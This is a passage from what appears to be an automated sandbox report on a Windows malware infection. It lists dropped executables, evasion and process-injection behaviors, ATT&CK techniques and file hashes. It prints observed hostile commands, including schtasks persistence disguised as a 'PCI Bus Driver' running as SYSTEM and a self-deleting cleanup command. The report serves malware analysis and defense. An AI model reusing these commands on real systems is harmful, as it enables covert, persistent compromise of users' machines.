    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10444690101\130f6b4251.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5968
- - C:\Users\Admin\AppData\Local\Temp\10444700101\V8LkpDo.exe
    "C:\Users\Admin\AppData\Local\Temp\10444700101\V8LkpDo.exe"
    3⤵
    - Executes dropped EXE
    PID:5824
- - C:\Users\Admin\AppData\Local\Temp\10444710101\QWWouxX.exe
    "C:\Users\Admin\AppData\Local\Temp\10444710101\QWWouxX.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4944
- - C:\Users\Admin\AppData\Local\Temp\10444720101\neww.exe
    "C:\Users\Admin\AppData\Local\Temp\10444720101\neww.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\neww.exe
      C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\neww.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:2772
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:220
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 1048
        6⤵
        Program crash
        
        PID:5328
- - C:\Users\Admin\AppData\Local\Temp\10444730101\but2.exe
    "C:\Users\Admin\AppData\Local\Temp\10444730101\but2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5208
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1648
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2064
  - - C:\Drivers\pcidrv.exe
      C:\Drivers\pcidrv.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5556
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10444730101\but2.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5840
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2924
- - C:\Users\Admin\AppData\Local\Temp\10444740101\i4cwegu.exe
    "C:\Users\Admin\AppData\Local\Temp\10444740101\i4cwegu.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5604
- - C:\Users\Admin\AppData\Local\Temp\10444750101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10444750101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5068
- - C:\Users\Admin\AppData\Local\Temp\10444760101\a24df40473.exe
    "C:\Users\Admin\AppData\Local\Temp\10444760101\a24df40473.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5140
- - C:\Users\Admin\AppData\Local\Temp\10444770101\7fcccf4ebd.exe
    "C:\Users\Admin\AppData\Local\Temp\10444770101\7fcccf4ebd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5988
- - C:\Users\Admin\AppData\Local\Temp\10444780101\1c87ab7903.exe
    "C:\Users\Admin\AppData\Local\Temp\10444780101\1c87ab7903.exe"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    PID:5780
- - C:\Users\Admin\AppData\Local\Temp\10444790101\bca55de347.exe
    "C:\Users\Admin\AppData\Local\Temp\10444790101\bca55de347.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1940

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5464

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3396 -ip 3396
1⤵
PID:5892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Drivers\pcidrv.exe

Filesize
2.3MB

MD5
e5cb0425792ae07695337b5d36369dea

SHA1
d0b53a35d9959afc34e746faa7da663c4dc31d82

SHA256
975df998975749de47d11c12056c03f8e387f5eb7b0348937770a11158cf4382

SHA512
f1c3fa5ab23cc544fa485dff63c2ecd7c3ceb1904fb8ea3c7ab016dad7036a0bf1977acf79a871b22450c30b94da700455e9df4e602741467dbb5a6f37fa0795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OMQG84ST\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OMQG84ST\soft[1]

Filesize
3.0MB

MD5
91f372706c6f741476ee0dac49693596

SHA1
8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

SHA256
9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

SHA512
88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

Download Submit
C:\Users\Admin\AppData\Local\TempTTXSEYBUZLTWEFLPHOKNVOS1USQKMP6O.EXE

Filesize
1.8MB

MD5
a616c70b521871a888c297266c93e4dc

SHA1
9c155bfcc1f54ad43feea0a5c03fc9d1b6529b7a

SHA256
788c57b940278eb945aec7589626e9282741922a6bf31769ab5beb4427a83eff

SHA512
9be0945d78d314e96e3b0d62ebe448e14650a9620bc9ba70df9c4d359f1302abcf28a1d553515bbfbc9f147041161a75b99742765cf7776f19a69ecd6989b662

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444660101\236de5c123.exe

Filesize
938KB

MD5
a798a2631ae2bc2f61b80ce937c75c65

SHA1
f718fd2971eb1c17f0c1b7940c00e2e8ff18bcc2

SHA256
3d3acb05b2a067b5bd9f7561320c2a61a23344c8f3cb78ac429b4e22b9f955b6

SHA512
2d55ef28fe438b20f1a7122ecd8002ce4e7e57006eebec290693b4be923c11ea82b58c90b9028cb103af4e2f15617e1b6a3dca7d6abce501f96121d7eb920daf

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444670101\80502d0525.exe

Filesize
1.8MB

MD5
15c8b2c9850ae1e61fefc93fa7d68420

SHA1
c5ae1454178293c4b26934572a8189bc5bb19798

SHA256
835795ba6a18c56ddc56f0fad120d0a6f4ce47a55f8b9f29c59692e3965285f0

SHA512
faaaf9dd1a9bdf77e76c6faa3d305d071289e280922b37ec6742c21642a05edf15cfb57663319e425755a62793446944b6b16c5eb1328c1567d5bad4fa0579e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444680101\c7c0b8b67d.exe

Filesize
5.9MB

MD5
e05432c13d42b8526ce4bc0dc240d297

SHA1
db6e9382425055030662ecdc95d6405d30dcf82a

SHA256
574c5ba90e69460799a53ea6fc88d8c6ba4b2b749f739f61779e1975e53e15d9

SHA512
56ad65cc3608f67b680599f8769a0bb0a8b16bdaaf62569c517fa54e72c12671d57472c1e88baaa13cf69a95b84887c527cba666abbca61a923d380dd71481ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444690101\130f6b4251.exe

Filesize
4.3MB

MD5
1fb7beea8967c3ce15e72e9a8d14dc28

SHA1
e2354deb9e8e84f7915bbad85fc934df8330557c

SHA256
56208f729c6b9895dd87a0f120972a8b48320b247b4f668f6ef9f483044d3e48

SHA512
6ba0db71de31f8ce3ee1cf84581015ac3bfc7fd898121214f92ba14b0f2b3bf75e11e9941c6d83f71364399af6be6159f141e78bde6b4f42036020842ff32381

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444700101\V8LkpDo.exe

Filesize
8.0MB

MD5
7b53eb00bf22b994fa8b48428e370c22

SHA1
35bf0858a1dd9953aff51838f71e3211c0cf39b3

SHA256
e47b6840a986f6ace12c353048ec996b3669987687f77c8b7dd9adf53575601b

SHA512
841d0504f055a5b93a9a690b09e9b0d05ad09b57ee30c620b81677fc26fd09eeb8a6396a5e1c198efb8b6eefd63ece7430f980bcbcd3bdd8c531912d1283d33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444710101\QWWouxX.exe

Filesize
946KB

MD5
99fa2a3f64994a182c851dfc314d9147

SHA1
53e4204543339534fe06f16f794b334b4d97b8fb

SHA256
083f0d9090d297c8159f1e9185bf4c98ae715d763d6abb06a7cf6742dbd7739c

SHA512
ff447fc7bbc1264d417e17654959074ae29d8b9089cad447b8f5af456ce1278e9797dbcd3bb84cc0e760100d019dbab05abc90ebd562d95489e8f5f336f2d1a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444730101\but2.exe

Filesize
3.1MB

MD5
31b30e8113ecec15e943dda8ef88781a

SHA1
a4a126fabb8846c031b3531411635f62f6e6abd7

SHA256
2f0ffc24180fa3b0b0489863860bff2afd3b87604aff55088d529a253fd73ef2

SHA512
55bb425bf612cd7750f85f78cacea7095109a561ddfa86c1ae88339a9deb7e6e930d5bee4dcaf7a206ae7d5b4144338c53be5c3fda94ecf1fbb3ce1a20329140

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444740101\i4cwegu.exe

Filesize
9.8MB

MD5
9a2147c4532f7fa643ab5792e3fe3d5c

SHA1
80244247bc0bc46884054db9c8ddbc6dee99b529

SHA256
3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

SHA512
c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444750101\Rm3cVPI.exe

Filesize
354KB

MD5
27f0df9e1937b002dbd367826c7cfeaf

SHA1
7d66f804665b531746d1a94314b8f78343e3eb4f

SHA256
aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

SHA512
ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444760101\a24df40473.exe

Filesize
1.8MB

MD5
ac7f9388bb990fd75d72356f9abe00b7

SHA1
e6fe475a4e49d8117e720dcf30fdfed7c30c6b4f

SHA256
0b439f9b4f38a3224e7f5fb09e80ef85317513d5617eb6a3d87f5d4cea7e1310

SHA512
caa66fe5ef8b9747e1cf1c8e6ac08499c50e780231a9475de09299f936a4ef67440d94e2f7d27c813ab24028526297352aea8e86f59236c3f09c0a1fa746ab02

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444770101\7fcccf4ebd.exe

Filesize
2.0MB

MD5
b39a7b7abb38128cd84111b9a2280354

SHA1
095b410f4b36160fb4e25782b9694dc59ddad189

SHA256
ddad9307f926eb50a91c42779e54a27b21647c8b0dcc339c8878f78782d39dab

SHA512
f45b4338b2c7e0c8f13585cb812cc55f85534119142f0f9b1ba5940cbfa35637f3ddd9d519c7c3a00c0953ce3762fc746ff161c768f5503db32764eb0a076714

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444780101\1c87ab7903.exe

Filesize
2.4MB

MD5
8d447e61f59a5c962647d5bb5303c0bd

SHA1
7dddcc5fcd5aefa6ef1471bc17949723ca2451d5

SHA256
958e2e8a5ea6582e391eede86070eaeb90bb0e98dac05d45ccb8b0f440a8ee75

SHA512
b89d53508c19ed22785b3582de3b889acbd4cbfdb8289cad8b840bc53c4e0eb897ee4f0e9c50384ede2b29df343a4a49264567843188417bef81e4049d708719

Download Submit
C:\Users\Admin\AppData\Local\Temp\10444790101\bca55de347.exe

Filesize
947KB

MD5
2ebbf3ae59011c5cf6dbee768e7da3ee

SHA1
b84e147696ac3bb26c0fe0fcefe1d27a5e655446

SHA256
a96331943b70bb564559493292db84f5f5e51bced7463e2e44c10102b09f9eb6

SHA512
42ca47bee1217e45feedc5897472f51a4e735aedcfe5376cfa577d1a1ff1dde2a6fe209e29df0f6146bf781cd36c964bc6629fe6d40f08645bed99a896a662fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\mscorlib.dll

Filesize
3.2MB

MD5
2a9d648e26737cf10e007466e69b32ad

SHA1
c6164fdd994f1b61b34a6f843fedc283adace311

SHA256
ff5bc05e7cf56a0bfc0f76871700a1e47248a906861507b22d3e1863114ed57f

SHA512
cadebefb8f5ceb41e9fb2130607fc71a4b309f813818ed8ca8ec077c92faeac4c8207d6c57f0e0cd5d347fe302b1eeb96c205402fc80ddc59c104eb65f12aabd

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-2.0.dll

Filesize
19.0MB

MD5
4c0f588776766601d238212793dbd265

SHA1
1d93b1fb2c4d1e4560845c33802556a32ef03f44

SHA256
6803e2ae189007eca3341bb929ff4787da7eb02d0a5138377863d63a9a53b4a4

SHA512
53334c64ba2ddfb22cd16d975f561f6efb28411c226b47c0d888d0d24a1dadcf6d875df9b473e4282a2c8581394fbef707515906cf3017504bfb0d67e95069e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-bz2-1.dll

Filesize
76KB

MD5
2ce8ffa22b809cd554553f91d1cc4120

SHA1
cfcb93ee08bc62cd4e81e2bbfef5958cc2767116

SHA256
d8960f2c96c1cfd331a4ba3e9b1168d468bf21b9b9e35d56574c41ae216528fd

SHA512
2b8c8b59ad4154e98b0208fff587be755469f87304ff31c784e6f436799bb952e2a4c3e58dd0f6eed7a2fbb1efe32d914fe8172aba09aa3f7c5809fe8fa0c383

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-gcrypt-20.dll

Filesize
809KB

MD5
1ef19a4c70d6a70ccd3beb7cf3f8f3fb

SHA1
09f27e34dbc7d8050653568a08efff6e97402487

SHA256
01d0a9c35bf1909d6c9c12938c944fa6e966d9731b3d523241148d73457fe228

SHA512
05fd1f4d53403d85bd5be278e4f97dc6573ee467ef4c97c14cf43719254bbc752229f833477215ba654df1f10d7ea1a2446160858083bcdbbb950c9125db643a

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-gpg-error-0.dll

Filesize
4.3MB

MD5
2617b5952d0dc1d30501a3b7b51e5f3a

SHA1
ed7c004849cd1d2ff0bb5090f37b2f2e41244632

SHA256
9af39637c3464dcbc925b24c4ad69c2892ff8f6714470068e1cf3e94798a995a

SHA512
88b47a02d530fb26639152947e4612f3465d3c77b6d603cdcd725950826f5d1e430cc044a6584dad0491573015c96985dbfbbd294942a3535866ef513ad6205d

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-iconv-2.dll

Filesize
1.0MB

MD5
201a1e2cb51fd63de986eb10eb63b102

SHA1
490c2432dc6be8b413379df1dd1e3cc2a2c2afc0

SHA256
8903f3e555910ce61d04d7701918cc1e2ebf58b538b50bc8bb46977a9aee220e

SHA512
a68bc678882ae7a91be78ce389813d3f6d04aeecd16662b2ec72ebf7c9d02e3385806de3486e9e038e49803ac713041ef060920e84da637aab175bbc03c758a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-intl-8.dll

Filesize
118KB

MD5
9e3c2aae15ca4d64663f6a2aae34f49a

SHA1
9b729ba542116f7f4436075cf8972e5d00dab31e

SHA256
b01721c410ac4a47a24927bd60dce4f7b1669684755e9ee52596493778dba956

SHA512
42240a60ec4db3539d48966b41301c638be7165a0dba408d6264ab59130c749ee5a30aa7f5f9f38fea644afd0d3374c620a04916682f08559f482938caf47061

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\msys-z.dll

Filesize
96KB

MD5
e2d249c598602e4f2319c8666506b82b

SHA1
20efc47cb2e853a0f5886d3d6e282766284ef81d

SHA256
fb025d533f2225d62b50cc47e7cfe0d0bd506675a3c40bc70190aa4de8abb8fb

SHA512
b34104c4a715fed610de685fbf822bc167697a6e5561bd0b3ce5d6707b54516ff7c00afae518889b0e4a1b5063c2a9f2bea20b099eea4f7fb3ba933e185e5c37

Download Submit
C:\Users\Admin\AppData\Local\Temp\56bbdfed090f3cb7bcde07d4c8bae7af\neww.exe

Filesize
72KB

MD5
9fa17f438815b4a61e69e35bbdaeba8b

SHA1
1d038227b4d7d198ca58e1b3eba2109defc23893

SHA256
050b95baf2df2f56926f4e3b37984de202a3609f210b2ff4680acba59aa8d95b

SHA512
9fa4dbad76b6d6e33305820064bc69f2feddf9c64fc7de809684265605ba89632691f43de05f49806dc9463957b15dbe8f491887ddea0d5fd12c4d08bdfa9765

Download Submit
C:\Users\Admin\AppData\Local\Temp\QsXSpsYcL.hta

Filesize
717B

MD5
f2385ab0993a8b6482bd5b7cbae938e1

SHA1
20cb4f6fe1fe9e001e29c3b772e0356336552e70

SHA256
0198026c9606e8c62443e2872e60d95afcb584a033c581ace36ad7c145c61fa8

SHA512
456978012d96f61dbd2be4466a1fbefa178ca078e1ce033977a206038e801ceda651a209d612877eeadd93e4786af366cb9cfeb0dfdf7c2becc3618bb100464b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdqvfxmv.ngw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

Filesize
1.8MB

MD5
61f742eba9e1c987ef5c084f46a399ca

SHA1
85facc0fd5b92a0d89bbbd02e4026dea86c1f293

SHA256
199b55fec7e308c69f1465301ab74aed087127126ba8ab4593a99e132458012b

SHA512
6264adf0546b77d1cb80249ce49974b9810df49fb8bfc0b8b94910c2880ccead8282cd3020055fd7f4e6ecad4c0b8a925f4c813071e9aa4babe1e014316d4239

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\Desktop\YCL.lnk

Filesize
2KB

MD5
280c40425e4c79d0cf9c1e1e173561d4

SHA1
1f5f5267fd94368a21ac7374b87ca08bdcabc96b

SHA256
290346db0371b61d3e5a31d81b636bf68d4b741c8240753ab07c5438bc7dea4f

SHA512
2fd477ef7cce5664d7b3bdb2db08f5ecbcc2727755d9839efb295da9a37e34c2875080c20f3e6dc27da504b55e24fd01786ce6d06d891a818f6e4a747a1bfe6f

Download Submit
memory/1904-152-0x0000000000400000-0x0000000000CD2000-memory.dmp

Filesize
8.8MB

Download
memory/1904-136-0x0000000000400000-0x0000000000CD2000-memory.dmp

Filesize
8.8MB

Download
memory/2412-76-0x00000000006F0000-0x0000000000BA5000-memory.dmp

Filesize
4.7MB

Download
memory/2412-93-0x00000000006F0000-0x0000000000BA5000-memory.dmp

Filesize
4.7MB

Download
memory/3396-300-0x0000000000400000-0x000000000073E000-memory.dmp

Filesize
3.2MB

Download
memory/3608-59-0x0000000005E10000-0x0000000005E5C000-memory.dmp

Filesize
304KB

Download
memory/3608-79-0x0000000007240000-0x00000000072D6000-memory.dmp

Filesize
600KB

Download
memory/3608-57-0x0000000005930000-0x0000000005C84000-memory.dmp

Filesize
3.3MB

Download
memory/3608-81-0x00000000082D0000-0x0000000008874000-memory.dmp

Filesize
5.6MB

Download
memory/3608-60-0x00000000076A0000-0x0000000007D1A000-memory.dmp

Filesize
6.5MB

Download
memory/3608-61-0x00000000062A0000-0x00000000062BA000-memory.dmp

Filesize
104KB

Download
memory/3608-42-0x0000000002440000-0x0000000002476000-memory.dmp

Filesize
216KB

Download
memory/3608-44-0x0000000005050000-0x0000000005678000-memory.dmp

Filesize
6.2MB

Download
memory/3608-80-0x00000000071A0000-0x00000000071C2000-memory.dmp

Filesize
136KB

Download
memory/3608-47-0x00000000056F0000-0x0000000005756000-memory.dmp

Filesize
408KB

Download
memory/3608-58-0x0000000005D60000-0x0000000005D7E000-memory.dmp

Filesize
120KB

Download
memory/3608-45-0x0000000004DE0000-0x0000000004E02000-memory.dmp

Filesize
136KB

Download
memory/3608-46-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/3848-249-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/3848-250-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/3888-92-0x00000000005E0000-0x0000000000A98000-memory.dmp

Filesize
4.7MB

Download
memory/3888-89-0x00000000005E0000-0x0000000000A98000-memory.dmp

Filesize
4.7MB

Download
memory/4172-116-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4172-144-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/4172-159-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4172-138-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4172-112-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4172-234-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4352-307-0x0000000210040000-0x00000002112B1000-memory.dmp

Filesize
18.4MB

Download
memory/4352-306-0x00000005603F0000-0x0000000560500000-memory.dmp

Filesize
1.1MB

Download
memory/4352-301-0x0000000100400000-0x0000000100416000-memory.dmp

Filesize
88KB

Download
memory/4352-302-0x00000004AEE70000-0x00000004AEF3D000-memory.dmp

Filesize
820KB

Download
memory/4352-303-0x0000000461220000-0x0000000461237000-memory.dmp

Filesize
92KB

Download
memory/4352-304-0x0000000522FE0000-0x0000000522FFD000-memory.dmp

Filesize
116KB

Download
memory/4352-308-0x0000000210040000-0x00000002112B1000-memory.dmp

Filesize
18.4MB

Download
memory/4352-305-0x0000000430B30000-0x0000000430B52000-memory.dmp

Filesize
136KB

Download
memory/4560-265-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-217-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-395-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-247-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-154-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-363-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-18-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-331-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-20-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-19-0x0000000000C21000-0x0000000000C4F000-memory.dmp

Filesize
184KB

Download
memory/4560-94-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-117-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-43-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-62-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-36-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-21-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-95-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-224-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-236-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4560-183-0x0000000000C20000-0x00000000010EF000-memory.dmp

Filesize
4.8MB

Download
memory/4944-206-0x0000000002980000-0x00000000029E4000-memory.dmp

Filesize
400KB

Download
memory/4944-205-0x00000000008E0000-0x00000000008E1000-memory.dmp

Filesize
4KB

Download
memory/5084-114-0x0000000000400000-0x00000000009F2000-memory.dmp

Filesize
5.9MB

Download
memory/5140-378-0x0000000000D80000-0x0000000001220000-memory.dmp

Filesize
4.6MB

Download
memory/5204-17-0x0000000000610000-0x0000000000ADF000-memory.dmp

Filesize
4.8MB

Download
memory/5204-1-0x00000000775B4000-0x00000000775B6000-memory.dmp

Filesize
8KB

Download
memory/5204-2-0x0000000000611000-0x000000000063F000-memory.dmp

Filesize
184KB

Download
memory/5204-3-0x0000000000610000-0x0000000000ADF000-memory.dmp

Filesize
4.8MB

Download
